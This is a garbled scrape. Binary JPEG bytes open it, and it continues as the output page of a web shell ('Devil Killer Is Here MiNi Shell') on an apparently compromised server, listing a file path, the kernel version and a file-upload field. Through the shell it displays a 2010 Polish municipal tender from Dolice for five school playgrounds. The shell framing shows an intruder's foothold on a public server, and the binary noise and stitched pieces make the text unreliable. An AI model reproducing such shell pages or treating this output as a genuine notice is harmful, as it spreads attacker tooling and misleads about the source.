JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100915/292304-N-2010.html

<p class="kh_header"><b>Dolice: WYKONANIE PLACÓW ZABAW W RAMACH PROGRAMU RADOSNA SZKOŁA przy Szkołach Podstawowych w Dobropolu, Dolicach, Rzeplinie, Sądowie i Żalęcinie</b><br>
<b>Numer ogłoszenia: 292304 - 2010; data zamieszczenia: 15.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dolice , ul. Ogrodowa 16, 73-115 Dolice, woj. zachodniopomorskie, tel. 091 5640129, faks 091 5640237.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.dolice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE PLACÓW ZABAW W RAMACH PROGRAMU RADOSNA SZKOŁA przy Szkołach Podstawowych w Dobropolu, Dolicach, Rzeplinie, Sądowie i Żalęcinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie 5 placów zabaw w ramach programu Radosna Szkoła przy Szkołach Podstawowych w Dobropolu, Dolicach, Sądowie, Żalęcinie (małe place) Rzeplinie (duży plac) na terenie gminy Dolice.
2.	Łączne wyposażenie placów zabaw w urządzenia zabawowe i stałe:
- Zestaw zabawowy typu Baza Korsarzy lub równoważne - szt 1. 
Zestaw o wymiarach około 520 x 921cm, wymiary ze strefą  bezpieczeństwa 820 x 1267cm  , wysokość całkowita do 380 cm, wysokość podestów do 120 cm, wysokość swobodnego upadku do 205cm przeznaczony dla przedziału wiekowego powyżej 3 lat, składający się z :
- zjeżdżalni,
- tuby do czworakowania,
- pionowej przeplotni,kratownicy linowej,
- kółka do podciągania,
- liny z supłami,
- drabiny pionowej i skośnej,
- kratownic linowych poziomych i skośnych,
- trapów, (kratownica linowa, linowego),
- ścianka wspinaczkowa. 
Wszystkie elementy drewniane wykonane z drewna litego bezrdzeniowego modrzewiowego lub drewna iglastego klejonego, ryflowanego i zabezpieczonego przed negatywnym działaniem czynników atmosferycznych. Słupy pionowe o przekroju nie mniejszym niż 90x90 mm mocowane w tulejach,kotwach stalowych zabezpieczonych galwanicznie, drugi koniec słupa zabezpieczony daszkiem z polietylenu lub podobnym, deski łączące słupy modrzewiowe o grubości nie mniejszej niż 40 mm. Podesty wykonane ze sklejki wodoodpornej gr. 15mm powlekanej tworzywem sztucznym lub desek modrzewiowych ryflowanych, łączone ze słupami łańcuchami ze stali nierdzewnej. Liny polipropylenowe sześciozwojowe zbrojone zakończone połączeniami z tworzywa sztucznego PE. Łańcuchy i elementy metalowe galwanizowane. Tuba-rura do czworakowania o średnicy do 650mm grubości około 15mm i długości około 160cm wykonana z polietylenu. Zjeżdżalnia, ślizg z blachy nierdzewnej, osłony z tworzywa sztucznego. Ścianka wspinaczkowa wykonana ze sklejki wodoodpornej powlekanej tworzywem sztucznym, kamienie wspinaczkowe wykonane z gumy lub tworzywa sztucznego o podobnych cechach, mocowane do płyty za pomocą śrub. Dachy wykonany z laminatów poliestrowych.  Elementy montażowe metalowe zabezpieczone galwanicznie.

- Zestaw zabawowy typu Tarzan lub równoważne szt. 4.
Zestaw o wymiarach około 626 x 456cm, wymiary ze strefą  bezpieczeństwa 751 x 976cm  , wysokość całkowita do 325 cm, wysokość podestów do 120 cm, wysokość swobodnego upadku do 160cm przeznaczony dla przedziału wiekowego powyżej 3 lat, składający się z :
- zjeżdżalni,
- tuby do czworakowania,
- rury strażackiej do zjeżdżania,
- pionowej przeplotni-kratownicy linowej,
- drabiny linowej,
- liny z supłami,
- balkonu,
- markizy,
- drabiny pionowej i skośnej
- równoważni linowej,
- kratownic linowych poziomych i skośnych.
Wszystkie elementy drewniane wykonane z drewna litego bezrdzeniowego modrzewiowego lub drewna iglastego klejonego, ryflowanego i zabezpieczonego przed negatywnym działaniem czynników atmosferycznych. Słupy pionowe o przekroju nie mniejszym niż 90x90 mm mocowane w tulejach-kotwach stalowych zabezpieczonych galwanicznie, drugi koniec słupa zabezpieczony daszkiem z polietylenu lub podobnym, deski łączące słupy modrzewiowe o grubości nie mniejszej niż 40 mm. Podesty wykonane ze sklejki wodoodpornej gr. 15mm powlekanej tworzywem sztucznym lub desek modrzewiowych ryflowanych, łączone ze słupami łańcuchami ze stali nierdzewnej. Liny polipropylenowe sześciozwojowe zbrojone zakończone połączeniami z tworzywa sztucznego PE. Łańcuchy i elementy metalowe galwanizowane. Tuba-rura do czworakowania o średnicy do 650mm grubości około 15mm i długości około 160cm wykonana z polietylenu. Zjeżdżalnia, ślizg z blachy nierdzewnej, osłony z tworzywa sztucznego. Dachy, markizy i balkon wykonany z laminatów poliestrowych.  Elementy montażowe metalowe zabezpieczone galwanicznie.
- Zestaw zabawowy typu Mały poligon lub równoważne szt. 5. 
Zestaw o wymiarach około 4,65 x 6,40m, wymiary ze strefą  bezpieczeństwa 7,75 x 9,75m  , wysokość całkowita do 1,25m, wysokość podestów do 0,40m, wysokość swobodnego upadku do 90cm przeznaczony dla przedziału wiekowego powyżej 3 lat, składający się z :
- ruchomych podestów,
- ruchomego mostu linowego,
- mostu wiszącego,
- równoważni linowej,
- kratownic linowych poziomych i skośnych.
Wszystkie elementy drewniane wykonane z drewna litego bezrdzeniowego modrzewiowego lub drewna iglastego klejonego, ryflowanego i zabezpieczonego przed negatywnym działaniem czynników atmosferycznych. Słupy pionowe o przekroju nie mniejszym niż 90x90 mm mocowane w tulejach-kotwach stalowych zabezpieczonych galwanicznie, drugi koniec słupa zabezpieczony daszkiem z polietylenu lub podobnym, deski łączące słupy modrzewiowe o grubości nie mniejszej niż 40 mm. Podesty wykonane ze sklejki wodoodpornej gr. około 15mm powlekanej tworzywem sztucznym lub ryflowanych desek modrzewiowych, łączone ze słupami łańcuchami ze stali nierdzewnej. Liny polipropylenowe sześciozwojowe zbrojone zakończone połączeniami z tworzywa sztucznego PE. Łańcuchy galwanizowane. Elementy montażowe metalowe zabezpieczone galwanicznie.
- Huśtawka pojedyncza szt. 4 i podwójna szt. 1. 
Pojedyncza -wymiary około 249 x 186cm, wymiary ze strefą  bezpieczeństwa 175 x 750cm  , wysokość całkowita do 235 cm, wysokość swobodnego upadku do 145 cm przeznaczony dla przedziału wiekowego powyżej 3 lat.
Podwójna -wymiary około 379 x 186cm, wymiary ze strefą  bezpieczeństwa 305 x 750cm  , wysokość całkowita do 235 cm, wysokość swobodnego upadku do 145 cm przeznaczony dla przedziału wiekowego powyżej 3 lat.
Słupy wykonane z drewna litego bezrdzeniowego modrzewiowego lub drewna iglastego klejonego, ryflowanego i zabezpieczonego przed negatywnym działaniem czynników atmosferycznych. Słupy o przekroju nie mniejszym niż 90x90 mm mocowane w tulejach-kotwach stalowych zabezpieczonych galwanicznie. Belka pozioma stalowa 100x100x3mm zabezpieczona antykorozyjnie i malowana. Zawieszenie wykonane z łańcucha zabezpieczonego galwanicznie, w górnej części zakończone krętlikami zapobiegającymi skręcaniu się łańcucha. Siedzenie wykonane z rdzenia zalanego gumą. Elementy montażowe metalowe zabezpieczone galwanicznie.
- Tablica regulaminowa szt. 5
Wszystkie elementy drewniane wykonane z drewna litego bezrdzeniowego modrzewiowego lub drewna iglastego klejonego, ryflowanego i zabezpieczonego przed negatywnym działaniem czynników atmosferycznych. Słupy pionowe o przekroju nie mniejszym niż 90x90 mm mocowane w tulejach-kotwach stalowych zabezpieczonych galwanicznie, drugi koniec słupa zabezpieczony daszkiem z polietylenu lub podobnym, deski łączące słupy modrzewiowe o grubości nie mniejszej niż 40 mm. Tablica wykonana z tworzywa sztucznego (PE) o wymiarach około 70x90cm. Elementy montażowe metalowe zabezpieczone galwanicznie.
Na placu zabaw musi zostać umieszczony regulamin placu zabaw jako piktogram graficzny i opisowy oraz informacja o realizacji placu w ramach programu Radosna szkoła według wzoru zalecanego przez MEN. 
- Ławka z oparciem szt. 10
Boki wykonane z betonu dekoracyjnego, grubość desek oparcia i siedziska min. 32mm, deski strugane i zabezpieczone przed negatywnym działaniem czynników atmosferycznych. Elementy montażowe metalowe zabezpieczone galwanicznie. 
- Ławostół szt. 2
Konstrukcja wykonana ze stali (profile zamknięte o wymiarach około 60x40x2mm) zabezpieczonej galwanicznie, deski grubość minimalna 32 mm (oparcia i siedziska) deski strugane i zabezpieczone przed negatywnym działaniem czynników atmosferycznych. Elementy montażowe metalowe zabezpieczone galwanicznie. 
3. Nawierzchnie
 Nawierzchnia bezpieczna
Nawierzchnia bezpieczna -kolor pomarańczowy-paleta barw PANTONE 152 C, RAL 2011 Tieforange o powierzchni odpowiednio 150 m2 małe place zabaw i 240 m2 duży plac zabaw - Rzeplino.
Nawierzchnia płytki 50 x 50 cm, bezpieczna przeznaczona jest na place zabaw dla dzieci oraz na tereny rekreacyjno-sportowe, spełniająca wymagania normy PN-EN 1177:2009.układana na podbudowie mineralnej. Płyty 50 x 50 cm z prasowanego granulatu gumowego i kolorowej warstwy EPDM gr. 4,5 cm i 7 cm przystosowana do swobodnego upadku z wysokości HIC  odpowiednio 1,6m i 2,2m, ułożenia krawężników po obrysie nawierzchni bezpiecznych. Nawierzchnia komunikacyjna
Nawierzchnia komunikacyjna -kolor niebieski-paleta barw PANTONE 540C, RAL 5003 Saphirblau o powierzchni około 20 m2 małe place zabaw i 50 m2 duży plac zabaw.
Spełniająca wymagania normy PN-EN 1177:2009, nawierzchnie z płyt 50 x 50 cm prasowanego granulatu gumowego i kolorowej warstwy EPDM gr. 4,5 cm i 7 cm na podbudowie mineralnej.
4. Ogrodzenie
Teren placu zabaw w miejscowości Żalęcino, Dobropole i Rzeplino będzie wydzielony  ogrodzeniem  panelowym o   szerokości 2,5m i wysokości 1,04m z furtką ( bramkę wejściową)   o szerokości  skrzydła 100cm ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.38.00-4, 45.11.27.23-9, 37.53.52.00-9, 45.34.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.    Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 15.000,00 zł (słownie: piętnaście tysięcy  złotych).
2.    Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)    pieniądzu,
2)    poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)    gwarancjach bankowych,
4)    gwarancjach ubezpieczeniowych,
5)    poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275).
3.    Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 100 000,00 PLN (słownie: sto tysięcy złotych).
2)	posiadają środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 100.000,00 PLN (słownie: sto tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.dolice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dolice ul. Ogrodowa 16, 73-115 Dolice, pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2010 godzina 10:00, miejsce: Urząd Gminy Dolice ul. Ogrodowa 16, 73-115 Dolice, pokój nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com